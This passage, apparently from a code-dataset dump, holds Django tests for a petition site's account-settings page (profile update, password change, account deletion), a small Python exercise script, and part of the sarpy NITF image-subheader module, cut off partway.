self.assertEqual(response.context['update_info_form_submitted'], False)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
def test_UserjohnPOSTUserInfoOK(self):
john = self.login("john")
update_info_form = get_update_form(john.user)
update_info_form.is_valid()
data = update_info_form.cleaned_data
data.update({
'update_info_form_submitted': 'yes',
})
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], john)
self.assertEqual(response.context['update_info_form_submitted'], True)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
def test_UserjohnPOSTPassChangeOK(self):
john = self.login("john")
new_pass = 'eytksjezu375&#'
data = {
'password_change_form_submitted': 'yes',
'old_password': 'john',
'new_password1': new_pass,
'new_password2': new_pass,
}
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], john)
self.assertEqual(response.context['update_info_form_submitted'], False)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], True)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), True)
self.assertEqual(response.context['password_change_form'].is_bound, True)
self.logout()
self.login("john", password=new_pass)
response2 = self.client.get(reverse("user_dashboard"))
self.assertEqual(response2.status_code, 200)
self.logout()
self.login("john")
response3 = self.client.get(reverse("user_dashboard"), follow=True)
self.assertRedirects(response3, reverse("login")+"?next="+reverse("user_dashboard"))
def test_UserjohnPOSTDeleteAccountOK(self):
# to avoid 404 error when index page redirects to deleted Organization profile page
with self.settings(INDEX_PAGE="ALL_PETITIONS"):
self.login("john")
data = {
'validation': "DROP MY ACCOUNT",
'delete_account_form_submitted': "yes",
}
f = DeleteAccountForm(data)
self.assertEqual(f.is_valid(), True)
response = self.client.post(reverse("account_settings"), data, follow=True)
self.assertRedirects(response, reverse("all_petitions"))
self.assertTemplateUsed(response, "layouts/base.html")
self.logout()
try:
self.login("john")
response2 = self.client.get(reverse("user_dashboard"))
self.assertRedirects(response2, reverse("login")+"?next="+reverse("user_dashboard"))
self.assertEqual(0, 1) # Should never be reached
except:
pass # I expected that!
pu = PytitionUser.objects.filter(user__username="john").count()
self.assertEqual(pu, 0)
User = get_user_model()
u = User.objects.filter(username="john").count()
self.assertEqual(u, 0)
def test_UsersarahPOSTUserInfoOK(self):
username = "sarah"
user = self.login(username)
update_info_form = get_update_form(user.user)
update_info_form.is_valid()
data = update_info_form.cleaned_data
data.update({
'update_info_form_submitted': 'yes',
})
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], True)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
def test_UsersarahPOSTPassChangeOK(self):
username ="sarah"
user = self.login(username)
new_pass = 'eytksjezu375&#'
data = {
'password_change_form_submitted': 'yes',
'old_password': username,
'new_password1': new_pass,
'new_password2': new_pass,
}
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], False)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], True)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), True)
self.assertEqual(response.context['password_change_form'].is_bound, True)
self.logout()
self.login(username, password=new_pass)
response2 = self.client.get(reverse("user_dashboard"))
self.assertEqual(response2.status_code, 200)
self.logout()
self.login(username)
response3 = self.client.get(reverse("user_dashboard"), follow=True)
self.assertRedirects(response3, reverse("login")+"?next="+reverse("user_dashboard"))
def test_UsersarahPOSTDeleteAccountOK(self):
# to avoid 404 error when index page redirects to deleted Organization profile page
with self.settings(INDEX_PAGE="ALL_PETITIONS"):
username = "sarah"
self.login(username)
data = {
'validation': "DROP MY ACCOUNT",
'delete_account_form_submitted': "yes",
}
f = DeleteAccountForm(data)
self.assertEqual(f.is_valid(), True)
response = self.client.post(reverse("account_settings"), data, follow=True)
self.assertRedirects(response, reverse("all_petitions"))
self.assertTemplateUsed(response, "layouts/base.html")
self.logout()
try:
self.login(username)
response2 = self.client.get(reverse("user_dashboard"))
self.assertRedirects(response2, reverse("login")+"?next="+reverse("user_dashboard"))
self.assertEqual(0, 1) # Should never be reached
except:
pass # I expected that!
pu = PytitionUser.objects.filter(user__username=username).count()
self.assertEqual(pu, 0)
User = get_user_model()
u = User.objects.filter(username=username).count()
self.assertEqual(u, 0)
def test_UserjuliaPOSTUserInfoOK(self):
username = "julia"
user = self.login(username)
update_info_form = get_update_form(user.user)
update_info_form.is_valid()
data = update_info_form.cleaned_data
data.update({
'update_info_form_submitted': 'yes',
})
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], True)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
def test_UserjuliaPOSTPassChangeOK(self):
username ="julia"
user = self.login(username)
new_pass = 'eytksjezu375&#'
data = {
'password_change_form_submitted': 'yes',
'old_password': username,
'new_password1': new_pass,
'new_password2': new_pass,
}
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], False)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], True)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), True)
self.assertEqual(response.context['password_change_form'].is_bound, True)
self.logout()
self.login(username, password=new_pass)
response2 = self.client.get(reverse("user_dashboard"))
self.assertEqual(response2.status_code, 200)
self.logout()
self.login(username)
response3 = self.client.get(reverse("user_dashboard"), follow=True)
self.assertRedirects(response3, reverse("login")+"?next="+reverse("user_dashboard"))
def test_UserjuliaPOSTDeleteAccountOK(self):
# to avoid 404 error when index page redirects to deleted Organization profile page
with self.settings(INDEX_PAGE="ALL_PETITIONS"):
username = "julia"
self.login(username)
data = {
'validation': "DROP MY ACCOUNT",
'delete_account_form_submitted': "yes",
}
f = DeleteAccountForm(data)
self.assertEqual(f.is_valid(), True)
response = self.client.post(reverse("account_settings"), data, follow=True)
self.assertRedirects(response, reverse("all_petitions"))
self.assertTemplateUsed(response, "layouts/base.html")
self.logout()
try:
self.login(username)
response2 = self.client.get(reverse("user_dashboard"))
self.assertRedirects(response2, reverse("login")+"?next="+reverse("user_dashboard"))
self.assertEqual(0, 1) # Should never be reached
except:
pass # I expected that!
pu = PytitionUser.objects.filter(user__username=username).count()
self.assertEqual(pu, 0)
User = get_user_model()
u = User.objects.filter(username=username).count()
self.assertEqual(u, 0)
def test_UsermaxPOSTUserInfoOK(self):
username = "max"
user = self.login(username)
update_info_form = get_update_form(user.user)
update_info_form.is_valid()
data = update_info_form.cleaned_data
data.update({
'update_info_form_submitted': 'yes',
})
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], True)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
def test_UsermaxPOSTPassChangeOK(self):
username ="max"
user = self.login(username)
new_pass = 'eytksjezu375&#'
data = {
'password_change_form_submitted': 'yes',
'old_password': username,
'new_password1': new_pass,
'new_password2': new_pass,
}
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], False)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], True)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), True)
self.assertEqual(response.context['password_change_form'].is_bound, True)
self.logout()
self.login(username, password=new_pass)
response2 = self.client.get(reverse("user_dashboard"))
self.assertEqual(response2.status_code, 200)
self.logout()
self.login(username)
response3 = self.client.get(reverse("user_dashboard"), follow=True)
self.assertRedirects(response3, reverse("login")+"?next="+reverse("user_dashboard"))
def test_UsermaxPOSTDeleteAccountOK(self):
with self.settings(INDEX_PAGE="ALL_PETITIONS"):
username = "max"
self.login(username)
data = {
'validation': "DROP MY ACCOUNT",
'delete_account_form_submitted': "yes",
}
f = DeleteAccountForm(data)
self.assertEqual(f.is_valid(), True)
response = self.client.post(reverse("account_settings"), data, follow=True)
self.assertRedirects(response, reverse("all_petitions"))
self.assertTemplateUsed(response, "layouts/base.html")
self.logout()
try:
self.login(username)
response2 = self.client.get(reverse("user_dashboard"))
self.assertRedirects(response2, reverse("login")+"?next="+reverse("user_dashboard"))
self.assertEqual(0, 1) # Should never be reached
except:
pass # I expected that!
pu = PytitionUser.objects.filter(user__username=username).count()
self.assertEqual(pu, 0)
User = get_user_model()
u = User.objects.filter(username=username).count()
self.assertEqual(u, 0)
def test_UsermaxPOSTDeleteAccountValidNOK(self):
username = "max"
self.login(username)
data = {
'validation': "DO *NOT* DROP MY ACCOUNT",
'delete_account_form_submitted': "yes",
}
f = DeleteAccountForm(data)
self.assertEqual(f.is_valid(), False)
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "layouts/base.html")
self.assertTemplateUsed(response, "petition/account_settings.html")
self.logout()
self.login(username)
response2 = self.client.get(reverse("user_dashboard"))
self.assertEqual(response2.status_code, 200)
pu = PytitionUser.objects.filter(user__username=username).count()
self.assertEqual(pu, 1)
User = get_user_model()
u = User.objects.filter(username=username).count()
self.assertEqual(u, 1)
def test_UserjuliaPOSTDeleteAccountValidNOK(self):
username = "julia"
self.login(username)
data = {
'validation': "DO *NOT* DROP MY ACCOUNT",
'delete_account_form_submitted': "yes",
}
f = DeleteAccountForm(data)
self.assertEqual(f.is_valid(), False)
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "layouts/base.html")
self.assertTemplateUsed(response, "petition/account_settings.html")
self.logout()
self.login(username)
response2 = self.client.get(reverse("user_dashboard"))
self.assertEqual(response2.status_code, 200)
pu = PytitionUser.objects.filter(user__username=username).count()
self.assertEqual(pu, 1)
User = get_user_model()
u = User.objects.filter(username=username).count()
self.assertEqual(u, 1)
def test_UserjohnPOSTDeleteAccountValidNOK(self):
username = "john"
self.login(username)
data = {
'validation': "DO *NOT* DROP MY ACCOUNT",
'delete_account_form_submitted': "yes",
}
f = DeleteAccountForm(data)
self.assertEqual(f.is_valid(), False)
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "layouts/base.html")
self.assertTemplateUsed(response, "petition/account_settings.html")
self.logout()
self.login(username)
response2 = self.client.get(reverse("user_dashboard"))
self.assertEqual(response2.status_code, 200)
pu = PytitionUser.objects.filter(user__username=username).count()
self.assertEqual(pu, 1)
User = get_user_model()
u = User.objects.filter(username=username).count()
self.assertEqual(u, 1)
def test_UsersarahPOSTDeleteAccountValidNOK(self):
username = "sarah"
self.login(username)
data = {
'validation': "DO *NOT* DROP MY ACCOUNT",
'delete_account_form_submitted': "yes",
}
f = DeleteAccountForm(data)
self.assertEqual(f.is_valid(), False)
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "layouts/base.html")
self.assertTemplateUsed(response, "petition/account_settings.html")
self.logout()
self.login(username)
response2 = self.client.get(reverse("user_dashboard"))
self.assertEqual(response2.status_code, 200)
pu = PytitionUser.objects.filter(user__username=username).count()
self.assertEqual(pu, 1)
User = get_user_model()
u = User.objects.filter(username=username).count()
self.assertEqual(u, 1)
def test_UserUnauthenticatedPOST(self):
self.logout()
data = {
'validation': "DROP MY ACCOUNT",
'delete_account_form_submitted': "yes",
}
f = DeleteAccountForm(data)
self.assertEqual(f.is_valid(), True)
response = self.client.post(reverse("account_settings"), data, follow=True)
self.assertRedirects(response, reverse("login")+"?next="+reverse("account_settings"))
self.assertTemplateUsed(response, "layouts/base.html")
def test_UserUnauthenticatedGET(self):
self.logout()
response = self.client.get(reverse("account_settings"), follow=True)
self.assertRedirects(response, reverse("login")+"?next="+reverse("account_settings"))
self.assertTemplateUsed(response, "layouts/base.html")
def test_UsermaxPOSTUpdateUserInfoEmailKO(self):
username = "max"
user = self.login(username)
initial_data = {
'first_name': user.user.first_name,
'last_name': user.user.last_name,
'email': "wrongEmailSyntax",
}
update_info_form = get_update_form(user.user, data=initial_data)
update_info_form.is_valid()
self.assertEqual(update_info_form.is_valid(), False)
data = update_info_form.cleaned_data
data.update({
'update_info_form_submitted': 'yes',
'email': "wrongEmailSyntax",
})
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], True)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), False)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
new_update_info_form = response.context['update_info_form']
self.assertIn('password_mismatch', new_update_info_form.error_messages)
self.assertIn('email', new_update_info_form.errors)
def test_UsersarahPOSTUpdateUserInfoEmailKO(self):
username = "sarah"
user = self.login(username)
initial_data = {
'first_name': user.user.first_name,
'last_name': user.user.last_name,
'email': "wrongEmailSyntax",
}
update_info_form = get_update_form(user.user, data=initial_data)
update_info_form.is_valid()
self.assertEqual(update_info_form.is_valid(), False)
data = update_info_form.cleaned_data
data.update({
'update_info_form_submitted': 'yes',
'email': "wrongEmailSyntax",
})
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], True)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), False)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
new_update_info_form = response.context['update_info_form']
self.assertIn('password_mismatch', new_update_info_form.error_messages)
self.assertIn('email', new_update_info_form.errors)
def test_UserjohnPOSTUpdateUserInfoEmailKO(self):
username = "john"
user = self.login(username)
initial_data = {
'first_name': user.user.first_name,
'last_name': user.user.last_name,
'email': "wrongEmailSyntax",
}
update_info_form = get_update_form(user.user, data=initial_data)
update_info_form.is_valid()
self.assertEqual(update_info_form.is_valid(), False)
data = update_info_form.cleaned_data
data.update({
'update_info_form_submitted': 'yes',
'email': "wrongEmailSyntax", # We put it again because invalid values are not part of cleaned_data
})
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], True)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), False)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
new_update_info_form = response.context['update_info_form']
self.assertIn('password_mismatch', new_update_info_form.error_messages)
self.assertIn('email', new_update_info_form.errors)
def test_UserjuliaPOSTUpdateUserInfoEmailKO(self):
username = "julia"
user = self.login(username)
initial_data = {
'first_name': user.user.first_name,
'last_name': user.user.last_name,
'email': "wrongEmailSyntax",
}
update_info_form = get_update_form(user.user, data=initial_data)
update_info_form.is_valid()
self.assertEqual(update_info_form.is_valid(), False)
data = update_info_form.cleaned_data
data.update({
'update_info_form_submitted': 'yes',
'email': "wrongEmailSyntax",
})
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], True)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], False)
self.assertEqual(response.context['update_info_form'].is_valid(), False)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, False)
new_update_info_form = response.context['update_info_form']
self.assertIn('password_mismatch', new_update_info_form.error_messages)
self.assertIn('email', new_update_info_form.errors)
def test_UsermaxPOSTPassChangeKOWrongOldPass(self):
username ="max"
user = self.login(username)
new_pass = 'eytksjezu375&#'
data = {
'password_change_form_submitted': 'yes',
'old_password': 'WrongOldPass',
'new_password1': new_pass,
'new_password2': new_pass,
}
response = self.client.post(reverse("account_settings"), data)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "petition/account_settings.html")
self.assertTemplateUsed(response, "layouts/base.html")
self.assertEqual(response.context['user'], user)
self.assertEqual(response.context['update_info_form_submitted'], False)
self.assertEqual(response.context['delete_account_form_submitted'], False)
self.assertEqual(response.context['password_change_form_submitted'], True)
self.assertEqual(response.context['update_info_form'].is_valid(), True)
self.assertEqual(response.context['update_info_form'].is_bound, True)
self.assertEqual(response.context['delete_account_form'].is_valid(), False)
self.assertEqual(response.context['delete_account_form'].is_bound, False)
self.assertEqual(response.context['password_change_form'].is_valid(), False)
self.assertEqual(response.context['password_change_form'].is_bound, True)
self.logout()
self.login(username)
response2 = self.client.get(reverse("user_dashboard"))
self.assertEqual(response2.status_code, 200)
self.logout()
self.login(username, password=new_pass)
response3 = self.client.get(reverse("user_dashboard"), follow=True)
self.assertRedirects(response3, reverse("login")+"?next="+reverse("user_dashboard"))
| 50.331234 | 110 | 0.672147 | 4,365 | 39,963 | 5.932417 | 0.046964 | 0.134968 | 0.169647 | 0.196949 | 0.919212 | 0.911296 | 0.907048 | 0.89106 | 0.884495 | 0.882255 | 0 | 0.006514 | 0.208618 | 39,963 | 793 | 111 | 50.394704 | 0.812275 | 0.015364 | 0 | 0.839838 | 0 | 0 | 0.193338 | 0.069082 | 0 | 0 | 0 | 0 | 0.41319 | 1 | 0.043069 | false | 0.131898 | 0.008075 | 0 | 0.053836 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 10 |
0ecb3bbc597ae4191ed7b7dd45ee486faa7fdeab | 112 | py | Python | ch01/ans07.py | upura/nlp100v2020 | 37d4d208d5d527d163356793b630f36eb7595779 | [
"MIT"
] | 66 | 2020-04-07T13:27:45.000Z | 2022-01-10T10:43:08.000Z | ch01/ans07.py | upura/nlp100v2020 | 37d4d208d5d527d163356793b630f36eb7595779 | [
"MIT"
] | 2 | 2021-04-30T21:11:02.000Z | 2022-01-13T02:33:08.000Z | ch01/ans07.py | upura/nlp100v2020 | 37d4d208d5d527d163356793b630f36eb7595779 | [
"MIT"
] | 12 | 2020-04-10T16:26:10.000Z | 2022-02-06T06:17:22.000Z | def generate_text(x, y, z):
return f'{x}時の{y}は{z}'
x = 12
y = '気温'
z = 22.4
print(generate_text(x, y, z))
| 12.444444 | 29 | 0.5625 | 26 | 112 | 2.346154 | 0.576923 | 0.393443 | 0.42623 | 0.459016 | 0.491803 | 0 | 0 | 0 | 0 | 0 | 0 | 0.056818 | 0.214286 | 112 | 8 | 30 | 14 | 0.636364 | 0 | 0 | 0 | 1 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0.166667 | 0.333333 | 0.166667 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 7 |
0ee0eab25ce452ff93366ecf77757b5b4fd4dec0 | 54,666 | py | Python | sarpy/io/general/nitf_elements/image.py | spacefan/sarpy | 2791af86b568c8a8560275aee426a4718d5a4606 | [
"MIT"
] | null | null | null | sarpy/io/general/nitf_elements/image.py | spacefan/sarpy | 2791af86b568c8a8560275aee426a4718d5a4606 | [
"MIT"
] | null | null | null | sarpy/io/general/nitf_elements/image.py | spacefan/sarpy | 2791af86b568c8a8560275aee426a4718d5a4606 | [
"MIT"
] | null | null | null | """
The image subheader definitions.
"""
__classification__ = "UNCLASSIFIED"
__author__ = "Thomas McCullough"
import logging
import struct
from collections import OrderedDict
from typing import Union
import numpy
from .base import NITFElement, NITFLoop, UserHeaderType, _IntegerDescriptor,\
_StringDescriptor, _StringEnumDescriptor, _NITFElementDescriptor, _parse_str
from .security import NITFSecurityTags, NITFSecurityTags0
logger = logging.getLogger(__name__)
######
# General components
class ImageBand(NITFElement):
"""
Single image band, part of the image bands collection
"""
_ordering = ('IREPBAND', 'ISUBCAT', 'IFC', 'IMFLT', 'LUTD')
_lengths = {'IREPBAND': 2, 'ISUBCAT': 6, 'IFC': 1, 'IMFLT': 3}
IREPBAND = _StringDescriptor(
'IREPBAND', True, 2, default_value='',
docstring='Representation. This field shall contain a valid indicator of the processing '
'required to display the nth band of the image with regard to the general image type '
'as recorded in the `IREP` field. The significance of each band in the image can be '
'derived from the combination of the `ICAT`, and `ISUBCAT` fields. Valid values of '
'the `IREPBAND` field depend on the value of '
'the `IREP` field.') # type: str
ISUBCAT = _StringDescriptor(
'ISUBCAT', True, 6, default_value='',
docstring='Subcategory. The purpose of this field is to provide the significance of the band '
'of the image with regard to the specific category (`ICAT` field) '
'of the overall image.') # type: str
IFC = _StringEnumDescriptor(
'IFC', True, 1, {'N', }, default_value='N',
docstring=' Image Filter Condition.') # type: str
IMFLT = _StringDescriptor(
'IMFLT', True, 3, default_value='',
docstring='Standard Image Filter Code. This field is reserved '
'for future use.') # type: str
def __init__(self, **kwargs):
self._LUTD = None
super(ImageBand, self).__init__(**kwargs)
@classmethod
def minimum_length(cls):
return 13
@property
def LUTD(self):
"""
The Look-up Table (LUT) data.
Returns
-------
None|numpy.ndarray
"""
return self._LUTD
@LUTD.setter
def LUTD(self, value):
if value is None:
self._LUTD = None
return
if not isinstance(value, numpy.ndarray):
raise TypeError('LUTD must be a numpy array')
if value.dtype.name != 'uint8':
raise ValueError('LUTD must be a numpy array of dtype uint8, got {}'.format(value.dtype.name))
if value.ndim != 2:
raise ValueError('LUTD must be a two-dimensional array')
if value.shape[0] > 4:
raise ValueError(
'The number of LUTD bands (axis 0) must be 4 or fewer. '
'Got LUTD shape {}'.format(value.shape))
if value.shape[1] > 65536:
raise ValueError(
'The number of LUTD elemnts (axis 1) must be 65536 or fewer. '
'Got LUTD shape {}'.format(value.shape))
self._LUTD = value
@property
def NLUTS(self):
"""
Number of LUTS for the Image Band. This field shall contain the number
of LUTs associated with the nth band of the image. LUTs are allowed
only if the value of the `PVTYPE` field is :code:`INT` or :code:`B`.
Returns
-------
int
"""
return 0 if self._LUTD is None else self._LUTD.shape[0]
@property
def NELUTS(self):
"""
Number of LUT Entries for the Image Band. This field shall contain
the number of entries in each of the LUTs for the nth image band.
Returns
-------
int
"""
return 0 if self._LUTD is None else self._LUTD.shape[1]
def _get_attribute_bytes(self, attribute):
if attribute == 'LUTD':
if self.NLUTS == 0:
out = b'0'
else:
out = '{0:d}{1:05d}'.format(self.NLUTS, self.NELUTS).encode() + \
struct.pack('{}B'.format(self.NLUTS * self.NELUTS), *self.LUTD.flatten())
return out
else:
return super(ImageBand, self)._get_attribute_bytes(attribute)
def _get_attribute_length(self, attribute):
if attribute == 'LUTD':
nluts = self.NLUTS
if nluts == 0:
return 1
else:
neluts = self.NELUTS
return 6 + nluts * neluts
else:
return super(ImageBand, self)._get_attribute_length(attribute)
@classmethod
def _parse_attribute(cls, fields, attribute, value, start):
if attribute == 'LUTD':
loc = start
nluts = int(value[loc:loc + 1])
loc += 1
if nluts == 0:
fields['LUTD'] = None
else:
neluts = int(value[loc:loc + 5])
loc += 5
siz = nluts * neluts
lutd = numpy.array(
struct.unpack('{}B'.format(siz), value[loc:loc + siz]), dtype=numpy.uint8).reshape(
(nluts, neluts))
fields['LUTD'] = lutd
loc += siz
return loc
return super(ImageBand, cls)._parse_attribute(fields, attribute, value, start)
class ImageBands(NITFLoop):
_child_class = ImageBand
_count_size = 1
@classmethod
def _parse_count(cls, value, start):
loc = start
count = int(value[loc:loc + cls._count_size])
loc += cls._count_size
if count == 0:
# (only) if there are more than 9, a longer field is used
count = int(value[loc:loc + 5])
loc += 5
return count, loc
def _counts_bytes(self):
siz = len(self.values)
if siz <= 9:
return '{0:1d}'.format(siz).encode()
else:
return '0{0:05d}'.format(siz).encode()
class ImageComment(NITFElement):
_ordering = ('COMMENT', )
_lengths = {'COMMENT': 80}
COMMENT = _StringDescriptor('COMMENT', True, 80, default_value='', docstring='The image comment')
class ImageComments(NITFLoop):
_child_class = ImageComment
_count_size = 1
########
# Masked image header - this is a binary structure
class MaskSubheader(NITFElement):
_ordering = (
'IMDATOFF', 'BMRLNTH', 'TMRLNTH', 'TPXCDLNTH', 'TPXCD', 'BMR', 'TMR')
_lengths = {
'IMDATOFF': 4, 'BMRLNTH': 2, 'TMRLNTH': 2, 'TPXCDLNTH': 2}
_binary_format = {
